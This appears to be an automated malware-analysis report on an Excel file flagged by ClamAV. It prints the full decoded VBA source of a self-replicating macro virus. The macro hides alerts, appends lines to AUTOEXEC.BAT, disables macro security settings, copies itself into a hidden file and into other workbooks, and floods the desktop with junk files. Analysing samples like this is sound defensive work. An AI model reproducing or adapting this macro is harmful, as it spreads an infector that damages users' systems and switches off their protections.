MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The VBA macro attempts to write to AUTOEXEC.BAT and C:\Windows\Nor.drv, indicating an attempt to modify system files. The macro also attempts to disable security settings and write its own code to a file, suggesting a persistence or execution mechanism. The ClamAV detections 'Win.Trojan.Psycho-3' and 'Xls.Trojan.Feeder-1' further support a malicious classification.
Heuristics 2
-
ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Psycho-3
-
VBA macros detected medium OLE_VBA_MACROSDocument contains VBA macro code
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3828 bytes |
SHA-256: e6d9559ce6def18a68d9dc26eb24cf0a537926161ee59c63297da0e9a2caf07f |
|||
|
Detection
ClamAV:
Xls.Trojan.Feeder-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' MarshYello
Private Sub Workbook_activate()
' Goof By Yello 25/10/00
On Error Resume Next
With Application
.DisplayAlerts = (5 * 2 - 10)
.Application.ScreenUpdating = (5 * 2 - 10)
.Application.DisplayStatusBar = (5 * 2 - 10)
End With
Open "c:\AUTOEXEC.BAT" For Append As #1
Print #1, Chr(83) & Chr(69) & Chr(84) & Chr(32) & Chr(84) & Chr(69) & Chr(77) & Chr(80) & Chr(61) & Chr(67) & Chr(58) & Chr(92) & Chr(87) & Chr(73) & Chr(78) & Chr(68) & Chr(79) & Chr(87) & Chr(83) & Chr(92) & Chr(68) & Chr(69) & Chr(83) & Chr(75) & Chr(84) & Chr(79) & Chr(80)
Close #1
Open "c:\AUTOEXEC.BAT" For Append As #1
Print #1, Chr(83) & Chr(69) & Chr(84) & Chr(32) & Chr(84) & Chr(77) & Chr(80) & Chr(61) & Chr(67) & Chr(58) & Chr(92) & Chr(87) & Chr(73) & Chr(78) & Chr(68) & Chr(79) & Chr(87) & Chr(83) & Chr(92) & Chr(68) & Chr(69) & Chr(83) & Chr(75) & Chr(84) & Chr(79) & Chr(80)
Close #1
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Open "C:\Windows\Nor.drv" For Output As #1
Print #1, VBProject.VBComponents(1).codemodule.Lines(1, 65)
Close #1
SetAttr ("C:\Windows\Nor.drv"), 6
Set ActiveWB = ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").codemodule
Set ThisWB = ThisWorkbook.VBProject.VBComponents("ThisWorkbook").codemodule
CheckExist = Dir(Application.StartupPath & "\Book1.")
If CheckExist = "" Then
VBAProject.ThisWorkbook.SaveAs Filename:=Application.StartupPath & "\Book1.", FileFormat:=xlNormal, AddToMru:=False
End If
If ActiveWB.Lines(3, 1) <> "' MarshYello" Then
ActiveWB.DeleteLines 1, ActiveWB.CountofLines
ActiveWB.AddFromFile ("C:\Windows\Nor.drv")
ActiveWorkbook.Save
End If
trouble1 = Right(Time, 5)
trouble = Left(trouble1, 2)
If trouble >= 45 Then Call MY_Name
End Sub
Private Sub MY_Name()
Count = 0
Do
Randomize
XXXX = Int((9999 * Rnd) + 1)
ZZZZ = Int((5 * Rnd) + 1)
If ZZZZ = 1 Then ZZZZ = Chr(46) & Chr(115) & Chr(104) & Chr(115)
If ZZZZ = 2 Then ZZZZ = Chr(46) & Chr(114) & Chr(97) & Chr(116)
If ZZZZ = 3 Then ZZZZ = Chr(46) & Chr(104) & Chr(108) & Chr(112)
If ZZZZ = 4 Then ZZZZ = Chr(46) & Chr(106) & Chr(115)
If ZZZZ = 5 Then ZZZZ = Chr(46) & Chr(119) & Chr(97) & Chr(118)
Open "c:\windows\desktop\" & XXXX & ZZZZ For Output As #1
Close #1
Count = Count + 1
Loop Until Count = 1000
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.